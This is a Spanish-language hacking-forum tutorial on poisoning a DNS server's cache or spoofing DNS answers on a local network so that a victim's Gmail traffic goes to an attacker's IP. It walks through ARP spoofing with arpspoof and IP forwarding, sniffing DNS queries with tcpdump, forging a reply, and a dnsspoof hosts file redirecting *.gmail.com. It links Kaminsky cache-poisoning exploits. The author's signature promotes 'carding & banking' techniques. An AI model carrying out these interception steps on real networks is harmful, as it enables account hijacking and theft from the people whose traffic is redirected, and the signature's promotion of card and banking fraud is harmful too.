Antes de seguir deben saber efectuar un man in the middle y spoofear paquetes, por suerte MurdeR ya habló de eso en los siguientes posts:
http://www.diosdelared.com/index.php/topic,176.0.html -> Arp Spoof
http://www.diosdelared.com/index.php?topic=9126.0 -> Sniffing + Spoofing de Redes

Volvemos al ejemplo de Pepe y Zer0 z0orG para que resulte mas sencillo:

Zer0 z0orG no pudo ownearse el DNS con su tecnica anterior pq estaba parcheado y no se owneó el mail de Pepe, entonces aprovecha que tiene control sobre un server que está en la misma red local que el [DNS de Pepe] para intentar hacer un Man in The Middle y envenenar a mano la caché! (Zer0 es bien leet eh :O)

Requisitos:
- Acceso y control total (/root) de una maquina en la red local
- hping2 (incluye en teoría arpspoof)

Primer paso:
Zer0 envenena la ARP haciendole creer al [Router] que el [PC OWNED] es en realidad [DNS de Pepe] y haciendole creer a [DNS de Pepe] que el [PC OWNED] es el [Router]:

Activa el forwarding para que todo lo que pase por [PC OWNED] sea retrasmitido automáticamente a su verdadero destinatario:
Citar
[root@PC OWNED Zer0]# echo 1 > /proc/sys/net/ipv4/ip_forward

Y procede a envenenar el ARP:

Citar
[root@PC OWNED Zer0]# arpspoof -t [Router] [DNS de Pepe]
arp reply [DNS de Pepe] is-at [PC OWNED]
arp reply [DNS de Pepe] is-at [PC OWNED]

Citar
[root@PC OWNED Zer0]# arpspoof -t [PC OWNED] [Router]
arp reply [Router] is-at [PC OWNED]
arp reply [Router] is-at [PC OWNED]

Con eso todo lo que envie [Router] a [DNS de Pepe] y viceversa pasará por [PC OWNED] pues hemos efecuado un envenenamiento de ARP.

Segundo paso:
Ahora Zer0 necesitá poner a funcionar un sniffer en tiempo real, en nuestro caso tcpdump con un script que detecte si hay una petición de parte de [DNS de Pepe] al [DNS de GMAIL] y en ese preciso instante de de baja el ip_forwarding:

Citar
[root@PC OWNED Zer0]# tcpdump -vvv -w /dump host [Router] and proto udp

Con eso se snifará todo el trafico que pase por nuestra maquina con destino a [Router] en protocolo udp. Lo que resta es hacer un script en bash que analice cada 1 segundo el contenido de "/dump", chequee si hay una peticion a [DNS de GMAIL], que en caso negativo borre el dump, en caso afirmativo detenga el ip_forwarding.

Tecer paso:
Ahora Zer0 que ya tiene el id de la petición falsea una respuesta de forma similar a la siguiente:

Citar
[DNS de GMAIL]. 124594 IN A 192.x.x.x

Donde 124594 es la ID y 192.x.x.x es la IP falseada.

Con esto quedaría en teoría envenenada la caché del [DNS de Pepe]!

Alternativa al Tercer paso:
Imaginando que Zer0 tuviera acceso la red local de Pepe en lugar de al DNS de Pepe sería mucho más sencillo usar la herramienta DNSSpoof:
(Los pasos anteriores serían identicos salvando la diferencia entre [DNS de Pepe] y [Pepe])

Citar
[root@PC OWNED Zer0]# dnsspoof -f hosts
dnsspoof: listening on eth0 [udp dst port 53 and not src [PC OWNED]]

Y luego creado el hosts de la siguiente forma:

Citar
----
[root@PC OWNED Zer0]# cat > hosts
192.x.x.x *.gmail.com
----

Con eso en cuanto [Pepe] le haga una petición al DNS relativa a gmail estará spoofeado el dns server y no habrá necesidad de envenenar la caché del verdadero DNS :P


~~~~~~~~~~~~~~~~~~~~~~~~~~
Despedida:
~~~~~~~~~~~~~~~~~~~~~~~~~~


Queda mucho más por decir, se puede hablar de metodos para intentar "adivinar" la ID de los mensajes y así evitar tener que spoofear, se puede hablar de exploits que lo hacen todo solo, de servidores mas o menos vulnerables, etc etc.
Yo creo que la teoría hasta acá llega y los que hayan leido y comprendido ya pueden considerar que saben bien que es y mas o menos como realizar un ataque a un DNS Server.

Para finalizar les pongo documentación y enlaces interesantes que DEBEN si o si chequear:


- Kaminsky DNS Cache Poisoning Flaw Exploit for host
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
- Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
- DNS Spoofing techniques
http://www.securesphere.net/download/papers/dnsspoof.htm
- Información técnica:
http://www.kb.cert.org/vuls/id/800113
http://www.us-cert.gov/cas/techalerts/TA08-190B.html
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
-Lista con el estado de servidores DNS de los principales ISP españoles:
http://bandaancha.eu/analizador-dns

Gothic-X

Este sera mi pequeño espacio de musica y algo de seguridad e inseguridad de internet
asi como les mostrare pequeñas tecnicas del carding & banking.
pueden visitar www.MexicanCrew.com || wwwDiosDeLaRed.com|| www.MundoNet.Us

Greetz: Tr4d3, Anarkill, Xoptik, Wijotoma, MurdeR, Knet, Wazz, Attacker, Ghost, NoFeck, Nexus, Sombrita_X, Masterteam, RedPoint, LastDragon, RedPeter, Oscar Rovira, MXCREW al user, DDLR all user, #RE al user